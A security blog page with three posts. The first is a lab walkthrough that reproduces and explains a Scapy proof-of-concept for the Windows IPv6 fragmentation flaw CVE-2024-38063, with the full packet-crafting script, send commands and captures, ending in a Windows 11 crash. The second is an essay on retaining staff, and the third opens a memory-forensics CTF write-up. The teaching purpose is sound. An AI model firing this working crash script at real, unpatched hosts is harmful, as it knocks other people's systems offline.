Friday, September 20, 2024

Understanding Packet Crafting - The Windows IPv6 Vulnerability - CVE-2024-38063: Remote Kernel Exploitation via IPv6

First up, this post is significantly influenced by Miloš ynwarcs script for the above vulnerability. My objective here is to simplify the understanding of what the script is doing. If you intend to follow along, see: https://github.com/ynwarcs/CVE-2024-38063/tree/main for the original script.

In the SANS SEC503, we use Scapy a lot for instructing on packet crafting as well as doing lots of demos to reinforce topics around packets. We also spend some time talking about IPv6. As a result, I thought putting together a quick blog post explaining ynwarcs script would be a good way for someone to learn a bit about IPv6, as well as packet crafting, both at the same time.

Microsoft's FAQ states "An unauthenticated attacker could repeatedly send IPv6 packets, that include specially crafted packets, to a Windows machine which could enable remote code execution."

The vulnerability above affects various versions of Windows and seems to be associated with an integer underflow. More specifically it has to do with the way Windows handles IPv6 extension headers. Even more specifically, in this case, how Windows handles IPv6 reassembly via the reassembly header.

I first tried targeting Windows 10 using the script from ynwarcs GitHub repo, the system did not crash. Here is the system configuration.

Host Name:                 SEC504STUDENT
OS Name:                   Microsoft Windows 10 Enterprise
OS Version:                10.0.19044 N/A Build 19044
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                00329-10186-30720-AA281
Original Install Date:     5/3/2022, 11:35:25 PM
System Boot Time:          9/20/2024, 4:28:04 AM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.

We can also see the IPv6 fragmented packets coming in and reassembly required.

C:\windows\system32>netsh interface ipv6 show ipstats
MIB-II IP Statistics
------------------------------------------------------
Forwarding is:                      Disabled
Default TTL:                        128
In Receives:                        46073
In Header Errors:                   9592
In Address Errors:                  16317
Datagrams Forwarded:                0
In Unknown Protocol:                0
In Discarded:                       0
In Delivered:                       30318
Out Requests:                       1019
Routing Discards:                   0
Out Discards:                       8
Out No Routes:                      0
Reassembly Timeout:                 60
Reassembly Required:                19110
Reassembled Ok:                     0
Reassembly Failures:                0
Fragments Ok:                       0
Fragments Failed:                   0
Fragments Created:                  0

What is surprising is that there is 0 "Reassembly Failures" and the system did not crash.

However, when I ran the script against Windows 11, the system crashed, resulting in a DoS.

C:\Users\securitynik>systeminfo | more

Host Name:                 SECURITYNIK-WIN
OS Name:                   Microsoft Windows 11 Pro
OS Version:                10.0.22621 N/A Build 22621
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Member Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          securitynik
Registered Organization:
Product ID:                00330-80000-00000-AA490
Original Install Date:     7/11/2023, 11:48:41 PM
System Boot Time:          9/20/2024, 10:10:53 AM
System Manufacturer:       VMware, Inc.
System Model:              VMware20,1
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.

Now, time to understand what the packet crafting within the script is doing.

The script is first importing the Scapy functions via:

from scapy.all import *

Next up, it is looking for some configuration information:

iface=''
ip_addr=''
mac_addr=''
num_tries=20
num_batches=20

I set mine to the Windows 11 host configuration. 

C:\Users\securitynik>ipconfig /all | more

Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : securitynik.local
   Description . . . . . . . . . . . : Intel(R) 82574L Gigabit Network Connection
   Physical Address. . . . . . . . . : 00-0C-29-40-04-91
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   Site-local IPv6 Address . . . . . : fec0::6%1(Preferred)
   Link-local IPv6 Address . . . . . : fe80::ffae:463c:5b03:ed01%12(Preferred)
   IPv4 Address. . . . . . . . . . . : 10.0.0.108(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . :

This represents the script initial configuration for my scenario.

iface='eth0' # <- This is the IP address of the attacking machine. In my case Kali Linux
ip_addr='fec0::6' # <- The Windows 11 target, IPv6 address
mac_addr='00:0C:29:40:04:91' # <- The MAC Address of the Windows 11 target host.
                                Note the change in format from "-" to ":"
num_tries=20    
num_batches=20

With the configuration out of the way, what is the function "get_packets_with_mac(i)" doing? Well upon closer look it seems it is doing basically the same thing as "get_packets(i)". The key difference seems to be that "get_packets_with_mac(i)" function is using the Ethernet header and setting the destination MAC via "Ether(dst=mac_addr)". "get_packets(i)" does not have this but it looks like everything else is basically the same. 

Updating my configuration.

iface='eth0' # <- This is the IP address of the attacking machine. In my case Kali Klinux
ip_addr='fec0::6' # <- The Windows 11 target, IPv6 address
mac_addr='' # Leaving this empty this time around
num_tries=20    
num_batches=20

Looking at the key part of the code which is the "get_packets(i)" function.

frag_id = 0xdebac1e + i

The "get_packets(i)" function takes a parameter "i", this I is coming from a for loop. Which means the "frag_id" is being incremented based on the number of tries. The fragment ID should be the same for all fragments within a "fragment train". This means that each of these fragments will be seen as a new fragment instead.

For example, if I set "num_batches" and "num_tries" above to 1, here is the output.

┌──(kali㉿securitynik)-[/tmp]
└─$ sudo python ./ipv6.py 
Get packets frag_id: 233548830   batch id: 0
Get packets frag_id: 233548830   batch id: 0
Sending packets
......
Sent 6 packets.
Memory corruption will be triggered in 51 seconds

Whereas, if I keep "num_tries" at 1 and change "num_batches" to 3, we see the fragment ID remains the same:

┌──(kali㉿securitynik)-[/tmp]
└─$ sudo python ./ipv6.py                                                                                            
Get packets frag_id: 233548830   batch id: 0     try: 0
Get packets frag_id: 233548830   batch id: 0     try: 0
Get packets frag_id: 233548830   batch id: 0     try: 0
Get packets frag_id: 233548830   batch id: 0     try: 0
Get packets frag_id: 233548830   batch id: 0     try: 0
Get packets frag_id: 233548830   batch id: 0     try: 0
Sending packets
..................
Sent 18 packets.
Memory corruption will be triggered in 51 seconds

If I set the "num_tries" to 3 and keep "num_batches" at 1, we see the change:

┌──(kali㉿securitynik)-[/tmp]
└─$ sudo python ./ipv6.py 
Get packets frag_id: 233548830   batch id: 0     try: 0
Get packets frag_id: 233548830   batch id: 0     try: 0
Get packets frag_id: 233548831   batch id: 1     try: 1
Get packets frag_id: 233548831   batch id: 1     try: 1
Get packets frag_id: 233548832   batch id: 2     try: 2
Get packets frag_id: 233548832   batch id: 2     try: 2
Sending packets
..................
Sent 18 packets.
Memory corruption will be triggered in 51 seconds

Now that we know the fragment ID is increasing with each try, time to dig into the rest of the code.

Looking at the 3 main lines:

first = IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0x81, optdata='a'*3)])
second = IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 1, offset = 0) / 'aaaaaaaa'    
third = IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 0, offset = 1)

Sending each line one at a time starting with the first. Notice I dropped the variables in the case of "64+i" and "ip_addr".

>>> send(IPv6(fl=1, hlim=64, dst='fec0::6') / IPv6ExtHdrDestOpt(options=[PadN(otype=0x81, optdata='a'*3)]))
.
Sent 1 packets.

So what is going on with that packet? Let's take a look at the IPv6 header first.

   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |Version| Traffic Class |           Flow Label                  |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |         Payload Length        |  Next Header  |   Hop Limit   |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                                                               |
   +                                                               +
   |                                                               |
   +                         Source Address                        +
   |                                                               |
   +                                                               +
   |                                                               |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                                                               |
   +                                                               +
   |                                                               |
   +                      Destination Address                      +
   |                                                               |
   +                                                               +
   |                                                               |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

In the crafted "IPv6()" header, the value "fl=1" represents the "Flow Label". This is a 20-bit field used by the sender to label sequences of packet to be treated in the network as a single flow. 

The "hlim=64" or "Hop Limit" is decremented by each host (think router for example) that forwards this packet. This is a 1-byte (8 bits) field.

"dst='fec0::6" - This is the 128-bit destination IP address of the host to receive this packet. For this demo, the host is at IPv6 address "fec0::6"

The next important part of this first packet is the "IPv6ExtHdrDestOpt". This relates to the "Destination Options Header". The optional information in this header should only be examined by the destination node (i.e. the true recipient of the packet)

    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
    |  Next Header  |  Hdr Ext Len  |                               |
    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+                               +
    |                                                               |
    .                                                               .
    .                            Options                            .
    .                                                               .
    |                                                               |
    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

What are the options to be specified in this case? The option is the PadN. PadN and Pad1 are the only options defined in RFC 8200.

PadN is used to insert 2 or more octets of padding into the Options area of the header. 

In this case the "optype=0x81" is an invalid option.

"optdata='a'*3" - This is just multiplying a 3 times. Hence resulting in an "opdata" of "aaa".

Looking at the packets from the network perspective

┌──(kali㉿securitynik)-[~]
└─$ sudo tcpdump -nnt --interface eth0 "host fec0::6" -X
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes

IP6 fec0::2 > fec0::6: DSTOPT no next header
        0x0000:  6000 0001 0008 3c40 fec0 0000 0000 0000  `.....<@........
        0x0010:  0000 0000 0000 0002 fec0 0000 0000 0000  ................
        0x0020:  0000 0000 0000 0006 3b00 8103 6161 6100  ........;...aaa.
IP6 fec0::6 > fec0::2: ICMP6, parameter problem, option - octet 42, length 56
        0x0000:  6000 0000 0038 3a80 fec0 0000 0000 0000  `....8:.........
        0x0010:  0000 0000 0000 0006 fec0 0000 0000 0000  ................
        0x0020:  0000 0000 0000 0002 0402 e59e 0000 002a  ...............*
        0x0030:  6000 0001 0008 3c40 fec0 0000 0000 0000  `.....<@........
        0x0040:  0000 0000 0000 0002 fec0 0000 0000 0000  ................
        0x0050:  0000 0000 0000 0006 3b00 8103 6161 6100  ........;...aaa.

Looking at the second packet:

second = IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 1, offset = 0) / 'aaaaaaaa'

Notice the small modifications, such as removing the variables:

>>> send(IPv6(fl=1, hlim=64, dst='fec0::6') / IPv6ExtHdrFragment(id=0xdebac1e, m = 1, offset = 0) / 'aaaaaaaa')
.
Sent 1 packets.

What is going on above?

Well no need to review the IPv6() header. Let's focus on the "IPv6ExtHdrFragment". In general, if a packet is larger than the Maximum Transmission Unit (MTU) of the network, that packet will need to be fragmented. In Ethernet the default MTU size is 1500 bytes. Hence, if you wish to spend a packet 1501 bytes, it will need to be fragmented.

The Fragment Header in IPv6 is used to send a packet that is larger than the MTU of the path to the destination. While in IPv4 fragmentation is handled by the source host and intermediate devices such as routers, in IPv6 this is only by source nodes. 

We already know from above that the "id=frag_id" is going to generate a new fragment ID for each packet starting with "0xdebac1e" (noticed the word debacle in there 😁) or decimal "233548830".  We also know that each fragment within a fragment train should have the same fragment ID. The fact that we have new fragment IDs for each try, means that we have a set of independent fragments. 

The "m=1" means we have more fragments coming beyond this one.

"aaaaaaaa" - 8 bytes of data. Each a represents a byte value. Hence eight 8 as in this case 8 bytes.

What does this packet look like on the network?

┌──(kali㉿securitynik)-[~]
└─$ sudo tcpdump -nnt --interface eth0 "host fec0::6" -X
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes

IP6 fec0::2 > fec0::6: frag (0|8) no next header
        0x0000:  6000 0001 0010 2c40 fec0 0000 0000 0000  `.....,@........
        0x0010:  0000 0000 0000 0002 fec0 0000 0000 0000  ................
        0x0020:  0000 0000 0000 0006 3b00 0001 0deb ac1e  ........;.......
        0x0030:  6161 6161 6161 6161                      aaaaaaaa

Note, if you are struggling to understand fragmentation in general, see this post I did a back in 2018, for a simplified walkthrough: https://www.securitynik.com/2018/07/understanding-ip-fragmentation.html

Let's prepare to wrap this up by looking at the "third" packet:

third = IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 0, offset = 1)


>>> send(IPv6(fl=1, hlim=64, dst='fec0::6') / IPv6ExtHdrFragment(id=0xdebac1e, m = 0, offset = 1))
.
Sent 1 packets.

The only items that need attention here is "m=0" and "offset=1". Let's break this down.

In the previous example of "IPv6ExtHdrFragment", we had "m=1". We also stated that this means more fragments were coming beyond this (in this case the previous fragment) header. With "m=0" this means there are no more fragments coming beyond this current one.

At the same time "offset=0" in the previous example now jumps to "offset=1". Here is a catch for some of you. In the previous fragment, we sent 8 bytes "aaaaaaaa". However, in this case, we are saying the offset is 1. Wouldn't this overwrite one of the "a" in "aaaaaaaa"? Well the answer is no and here is why. 

The fragment offset is represented as a 13-bit field within a 16-bit field. With the high order 16 bits representing the "Fragment Offset", we have the low order bit representing the "M flag". This is what was set above to "m=1" and "m=0" respectively. Finally, we have a 2 bit field (00) "Res" which is reserved. 

But still, why no overwriting?! Well, the "Payload Length" field is 16 bits. Meaning we have 2**16 or 65536 bytes available to us. It represents everything beyond the IPv6 header including the extensions. However, the "Fragment Offset" only represents 13 bits. Hence if we do 2**13, we get 8192. As we can see, this does not equate to our 65536. However, if we multiply 8192*8, we get 65536 which gets us back to size of the "Payload Length". So when we see the above "offset=1", we need to multiply the offset value by 8. Hence our actual offset is 8 in decimal. Thus, this fragment falls directly at the end of sequence of the 8 "a". Keep in kind also, when counting offsets, we count from 0. So, 8 bytes goes from 0-7. Hence the final fragment at offset 8 sits directly after this one.

Also something else to consider, we sent only 16 bytes of payload in the first fragment. 8 of these represent the "Fragment Header" and the other 8 bytes represent the sequence of 8 "a" for 8 bytes. The second fragment we sent no data but there is an 8 byte "Fragment Header". In total, we sent 24 bytes. This is wayyyyyyyyyyyyy below any normal MTU and on a normal day would not require fragmentation.

What does the final packet look like on the wire:

┌──(kali㉿securitynik)-[~]
└─$ sudo tcpdump -nnt --interface eth0 "host fec0::6" -X
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes

IP6 fec0::2 > fec0::6: frag (8|0)
        0x0000:  6000 0001 0008 2c40 fec0 0000 0000 0000  `.....,@........
        0x0010:  0000 0000 0000 0002 fec0 0000 0000 0000  ................
        0x0020:  0000 0000 0000 0006 3b00 0008 0deb ac1e  ........;.......

With core understanding of what ynwarcs's script does, I am just removing some items for simpicity of visualization in this case. Please refer to the original code for full guidance.

from scapy.all import *

iface='eth0'
ip_addr='fec0::6'
num_tries=20
num_batches=20
	

def get_packets(i):
    frag_id = 0xdebac1e + i
    print(f'Get packets frag_id: {frag_id} \t batch id: {i} \t try: {i}')
    first = IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0x81, optdata='a'*3)])
    second = IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 1, offset = 0) / 'aaaaaaaa'
    third = IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 0, offset = 1)
    return [first, second, third]

final_ps = []
for _ in range(num_batches):
    for i in range(num_tries):
        final_ps += get_packets(i) + get_packets(i)

print("Sending packets")
send(final_ps, iface)

for i in range(60):
    print(f"Memory corruption will be triggered in {60-i} seconds", end='\r')
    time.sleep(1)
print("")

This is a snapshot of the host "ipstats" prior to sending the script above.

C:\Users\securitynik>netsh interface ipv6 show ipstats
MIB-II IP Statistics
------------------------------------------------------
Forwarding is:                      Disabled
Default TTL:                        128
In Receives:                        0
In Header Errors:                   0
In Address Errors:                  0
Datagrams Forwarded:                0
In Unknown Protocol:                0
In Discarded:                       0
In Delivered:                       43
Out Requests:                       74
Routing Discards:                   0
Out Discards:                       0
Out No Routes:                      0
Reassembly Timeout:                 60
Reassembly Required:                0
Reassembled Ok:                     0
Reassembly Failures:                0
Fragments Ok:                       0
Fragments Failed:                   0
Fragments Created:                  0

Run the script:

┌──(kali㉿securitynik)-[/tmp]
└─$ sudo python ./ipv6.py 
Get packets frag_id: 233548830   batch id: 0     try: 0
Get packets frag_id: 233548830   batch id: 0     try: 0
Get packets frag_id: 233548831   batch id: 1     try: 1
...
Sent 2400 packets.
Memory corruption will be triggered in 1 seconds
 
After running the script (and before it crashes) we see on the Windows hosts.

C:\Users\securitynik>netsh interface ipv6 show ipstats
MIB-II IP Statistics
------------------------------------------------------
Forwarding is:                      Disabled
Default TTL:                        128
In Receives:                        2426
In Header Errors:                   0
In Address Errors:                  0
Datagrams Forwarded:                0
In Unknown Protocol:                0
In Discarded:                       0
In Delivered:                       2469
Out Requests:                       902
Routing Discards:                   0
Out Discards:                       0
Out No Routes:                      0
Reassembly Timeout:                 60
Reassembly Required:                1598
Reassembled Ok:                     0
Reassembly Failures:                0
Fragments Ok:                       0
Fragments Failed:                   0
Fragments Created:                  0

Finally we see the system crash: 




Wednesday, August 28, 2024

3 simple tips, for retaining your critical resources in the 21st century

Back in 2016, I wrote an article on my blog at www.securitynik.com titled "On recruiting and retaining talented Cyber Security professionals". (https://www.securitynik.com/search?q=center+for+strategic). In that article, I referenced a Center For Strategic and International Studies report: (https://www.csis.org/analysis/recruiting-and-retaining-cybersecurity-ninjas) and agreed with the report findings, given my own experience with the topic.

Here we are in 2024, and this problem might have gotten worse, as top talent in general can be harder to retain and even costlier. This problem has now extended to the new hot and exciting field of AI. As reported by the Wall Street Journal "American companies are in the midst of an AI recruiting frenzy" (https://www.wsj.com/articles/artificial-intelligence-jobs-pay-netflix-walmart-230fc3cb). 

Many, (almost all) organizations, talk about their people being their most important assets. However, how many of these organization are truly practicing what they are preaching? We read about quiet quitting, massive layoffs, etc. What gives? Is it the employee or the companies at fault, for this seeming lack, of a mutually beneficial relationship?

Before we move forward, let us be clear. I'm not speaking about this topic from a HR perspective, as I am in no position of authority to do so. However, I do bring credibility to this topic, having been a Manager, Sr. Manager and now a Director in a Managed Security Services, Security Operation Center (SOC), where I led the creation and expansion of the initial Cyber Security Team. I do bring credibility, having led the resource development and or expansion of SOCs in Canada, India and Eastern Europe. More importantly, I do bring credibility to this topic, having worked with local colleges as part of their Program Advisory Committees (PAC) and as the lead who recruited, developed and retained those colleges resources as part of their co-op and eventual hire within the SOC. Additionally, I have been a mentor for The SANS Institute and Ryerson (now Toronto Metropolitan University (TMU), as part of the Rogers Cyber Secure Catalyst program and now their Advanced Cyber Education (ACE) program. These experiences gives me a better vantage point and (in my opinion 😉) the credibility to speak on this topic, maybe even better than some HR professionals 😉

So with that said, here are my 3 keys to successful retention of your critical resources: Respect, Appreciate and value

Respect:
Your employees want to feel (notice the emotion) respected. If you don't respect your employees, there is always a recruiter out there who respects what they have done, trying to poach them to see if they can replicate their work in a different organization. Remember, this is the 21st century. While people still do send out applications, the reality is, in most cases, your employees are being regularly contacted by recruiters. This makes it easy for your critical resources to take their talents to another organization. As I stated in my 2016 article, I have been on both sides of this equation. First, being directly recruited by other organization/recruiters and on the other side, watching my people being recruited.

Appreciate:
Your employees want to feel (notice the emotion again) appreciated. We live in a world where some folks do it for the likes rather than the love. The social media generation wants constant affirmation. Pay attention to their needs. If you do not show appreciation and someone else does, then it is more likely your critical resources will leave your organization. Let's also be clear, the grass (company) on the other side of the fence is not always greener. Sometimes it is even fake grass. However, what most employees want, is to know the patch (business unit) of the lawn they are standing on, has a caretaker (leader) that keeps that patch real, comfortable and worthy to stand on. Remember, people don't leave bad companies, they leave bad managers. So if their immediate manager is great, your employees are willing to ignore the rest of what is going on within the organization.

Value:
Your employees want to feel (notice the emotion again and again) valued. Your employees want to know (not emotion now, but logic) they are being compensated fairly, at market value. Most employees are not interested in becoming millionaires/billionaires. They all don't aspire to become the next Head ... In Charge (H.IC). They just want to be able to support their families. Let's be clear, every employee cannot be valued from the same perspective. There are employees that are rockstars and will succeed in any organization/environment. Then there are the rocks, indispensable to your organization, solid in what they do but are not confident about how they would do outside of your org. Then there are the "pebbles", those that are there just because, but do play an important role. Ensure you at least prioritize your rockstars and rocks. Be aware, there is always someone else willing to pay more. However, your employees are more likely to give you loyalty and stay with your organization, even if more is being offered, once they know they have your respect, you appreciate them and you value them. 

Extra (Should this be extra in today's world?)
Since I am here, have flexible work from home policies where and when possible. Come on this is the 21st century. Let's measure performance and quality of output, rather than attendance. 

Ohhh, on a parting note (my rant) for those leaders who talk about remote work “... doesn't work for those who want to hustle", let's be clear, a real hustler, hustles, whether you give that person a street corner or a corner office.

Friday, March 8, 2024

**TOTAL RECALL 2024** - Memory Forensics Self-Paced Learning/Challenge/CTF

Similar to "Solving the CTF challenge - Network Forensics (packet and log analysis), USB Disk Forensics, Database Forensics, Stego" this challenge is meant to support our team's development.

This challenge can be looked at from both the Blue and Red Team perspectives. 

Blue team because, this is how we hope to find threats either from a "live" system or more specifically, in this case, from the contents of extracted memory, i.e. memory dumps, crash dumps, etc.

Red teams because threat actors can steal memory dumps to gain access to sensitive information. For those thinking this is far fetched, see this link for more info on a recent compromise, that occurred at Microsoft: Results of Major Technical Investigations for Storm-0558 Key Acquisition | MSRC Blog | Microsoft Security Response Center

Here is a brief from the link:
"Our investigation found that a consumer signing system crash in April of 2021 resulted in a snapshot of the crashed process (“crash dump”). The crash dumps, which redact sensitive information, should not include the signing key. In this case, a race condition allowed the key to be present in the crash dump ..."

After April 2021, when the key was leaked to the corporate environment in the crash dump, the Storm-0558 actor was able to successfully compromise a Microsoft engineer’s corporate account. This account had access to the debugging environment containing the crash dump which incorrectly contained the key. Due to log retention policies, we don’t have logs with specific evidence of this exfiltration by this actor, but this was the most probable mechanism by which the actor acquired the key."

As seen above, memory can and does contain a lot of sensitive information. More importantly, it is not in every incident you will have all the logs as mentioned above. 

With that in mind, Welcome to **Total Recall 2024** where we try to build our memory forensics skills while having fun.

Scenario:

As the Lead Incident Handler at **TOTAL RECALL Inc.** a memory forensics company, you have been assigned a case to determine the extent of a possible compromise at a highly confidential client. The client has followed the NIST 800-86 Guide to Integrating Forensic Techniques into Incident Response and have done the evidence collection. Your job, is to examine, analyze and report on this potential incident.

Source: NIST800-86: Guide to Integrating Forensic Techniques into Incident Response

You do not have any known Indicators of Compromise (IoC) or Events of Interest (EoI) but have been tasked with determining the (potential) compromise and its scope. That is all you have to go on!

As you answer the client’s questions, you should take notes, draw diagrams, etc. 

Here are 10 things, you are guaranteed to learn by completing this challenge:
1. Memory Forensics: This is our primary objective!
2. Extracting credentials from memory: Not just passwords, but also web server (certificates) public and private key information. Similar to what happened with this compromise at Microsoft. This allows us to encrypt/decrypt, sign and verify items on the compromised server behalf.
3. Perform network forensics (log analysis):  Yep! We extract the logs from the memory to learn more about the attack.
4. Basic Malware Analysis: That's correct! Extracting/Reconstructing executables from memory and doing basic static analysis.
5. Attack(s) identification: Learning to attribute a particular tactic and or technique to a compromise.
6. Vulnerability Research: Find the version of software and any known vulnerabilities associated with same.
7. Recovering PowerShell history from memory.
8. Web Server configuration at the time of compromise.
9. Detecting persistence in memory.
10. Lots of fun learning about memory forensics.

Good luck and have fun learning!

Data for this challenge
Note: Try downloading the individual files if you have a problem downloading the entire package.

My write-up for the challenge, so that readers can walk or follow through.

These first few questions allow us to learn about the received memory image, before performing any analysis.

When performing forensics, one of the first steps, is confirming the file integrity is intact.

Q: What is md5sum hash of the file received:
A:
┌──(kali㉿securitynik)-[~/CHALLENGES]
└─$ md5sum TOTAL_RECALL_2024.zip --tag
MD5 (TOTAL_RECALL_2024.zip) = 7dceb1fcae2ed8beacc8f81f85bf935c

Q: Does this hash match the one provided?
A: Yes: 
┌──(kali㉿securitynik)-[~/CHALLENGES]
└─$ cat TOTAL_RECALL_2024.md5sum
7dceb1fcae2ed8beacc8f81f85bf935c  TOTAL_RECALL_2024.zip

With the hashes confirmed, we can move on to our analysis.
Extracting the files from the ZIP file.

┌──(kali㉿securitynik)-[~/CHALLENGES]
└─$ unzip ChristmasChallenge2023.zip -d TOTAL_RECALL_2024/
Archive:  ChristmasChallenge2023.zip
  inflating: TOTAL_RECALL_2024/SECURITYNIK-WIN-20231116-235706.dmp
  inflating: TOTAL_RECALL_2024/SECURITYNIK-WIN-20231116-235706.json

Change the directory so all output for this challenge is included there:

┌──(kali㉿securitynik)-[~/CHALLENGES]
└─$ cd TOTAL_RECALL_2024/

Looking at the memory dump file info specifically:

Q: What is the SHA256 hash of the file containing the memory dump?
A: 
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ sha256sum SECURITYNIK-WIN-20231116-235706.dmp
cabe2fd543eac1cd2eab9ccd0a840d83481a3f00e16015287323b2cb44fe0686  SECURITYNIK-WIN-20231116-235706.dmp

Q: What is the size of the memory dump file?
A:
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ls -l SECURITYNIK-WIN-20231116-235706.dmp -l
-rw-r--r-- 1 kali kali 4293816320 Nov 16 18:57 SECURITYNIK-WIN-20231116-235706.dmp

Q: Were you able to confirm this file integrity? If yes, how?
A: Yes! There is a JSON file that comes with the memory dump. Here is its information.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat SECURITYNIK-WIN-20231116-235706.json | grep fileInfo --after-context=2
    "fileInfo": {
        "fileSize": 4293816320,
        "sha256": "cabe2fd543eac1cd2eab9ccd0a840d83481a3f00e16015287323b2cb44fe0686"


I deliberately used the true date and time from the file. I'm sure someone is going to over think this :-D 

Looking at the machine info, answer the following questions:
Q: What is the machine Architecture: 
Q: Date and time the memory dump was taken:
Q: Domain the computer was part of:
Q: The Machine ID:
Q: The Machine Name:
Q: What is the timestamp in raw epoch. For example: 133446526281339811:
Q: Name of the user logged in at the time the capture was taken

A: All of this information above, can be found below.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat SECURITYNIK-WIN-20231116-235706.json | grep machineInfo --after-context=9
    "machineInfo": {
        "architectureType": "x64",
        "date": "2023-11-16T23:57:55.647Z",
        "domainName": "SECURITYNIK",
        "machineId": "3A424D56-BF4F-0582-FA8B-86105F2A025C",
        "machineName": "SECURITYNIK-WIN",
        "maxPhysicalMemory": 5368709120,
        "numberProcessors": 2,
        "timestamp": 133446526281339811,
        "userName": "securitynik"

Looking at the operating system information

Q: What is the OS major version?
Q: What is the OS minor version?
Q: What is the product type?
Q: Is the product type a server or desktop/workstation, etc.?
A: Desktop because of product type 1:
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat SECURITYNIK-WIN-20231116-235706.json | grep osVersion --after-context=7
    "osVersion": {
        "buildNumber": 22621,
        "majorVersion": 10,
        "minorVersion": 0,
        "productType": 1,
        "servicePackMajor": 0,
        "servicePackMinor": 0,
        "suiteMask": 256

Looking at the memory acquisition info:

Q: What was the acquisition time of this memory dump?
Q: What is the name of the tool/service used to capture this memory?
Q: What version of the tool was used?
Q: What is the total accessible pages of memory that was capture?
Q: What is the total inaccessible pages of memory captured?
Q: What is the total physical pages of memory captured?

A: All of the information requested above, can be found below.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat SECURITYNIK-WIN-20231116-235706.json | grep serviceInfo --after-context=7
    "serviceInfo": {
        "acquisitionTime": "0:47",
        "ntStatus": 0,
        "serviceName": "DumpIt",
        "serviceVersion": "3.0.20180307.1",
        "totalAccessiblePages": 1048293,
        "totalInaccessiblePages": 0,
        "totalPhysicalPages": 1048293

All of the information above so far, can be had by just looking at the SECURITYNIK-WIN-20231116-235706.json file. This means simply opening this file, you get the answers to the first 22 questions!

With information out of the way about the memory image. Time to actually perform the analysis.

Typically, we want to start off with the info.Info plugin. 

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp  windows.info.Info
Volatility 3 Framework 2.5.2
Progress:  100.00               PDB scanning finished
Variable        Value

Kernel Base     0xf8021f400000
DTB     0x1ae000
Symbols file:///home/kali/volatility3/volatility3/symbols/windows/ntkrnlmp.pdb/9DC3FC69B1CA4B34707EBC57FD1D6126-1.json.xz
Is64Bit True
IsPAE   False
layer_name      0 WindowsIntel32e
memory_layer    1 WindowsCrashDump64Layer
base_layer      2 FileLayer
KdVersionBlock  0xf802200099b0
Major/Minor     15.22621
MachineType     34404
KeNumberProcessors      2
SystemTime      2023-11-16 23:57:55
NtSystemRoot    C:\Windows
NtProductType   NtProductWinNt
NtMajorVersion  10
NtMinorVersion  0
PE MajorOperatingSystemVersion  10
PE MinorOperatingSystemVersion  0
PE Machine      34404
PE TimeDateStamp        Mon Jul 16 20:24:05 2063

Looking at the Windows session information.

Get the data into a file as always;
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.sessions.Sessions > sessions.txt
Progress:  100.00               PDB scanning finished

Q: How many unique Windows sessions are seen via the memory dump?
   Sessions numbers are integer values
A: Two sessions: 0 and 1
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat sessions.txt | awk --field-separator=' ' '{ print $1 }' | sort --unique
0
1

Q: What are these session associated with?
A: Session 0 is used by services and other non-interactive applications
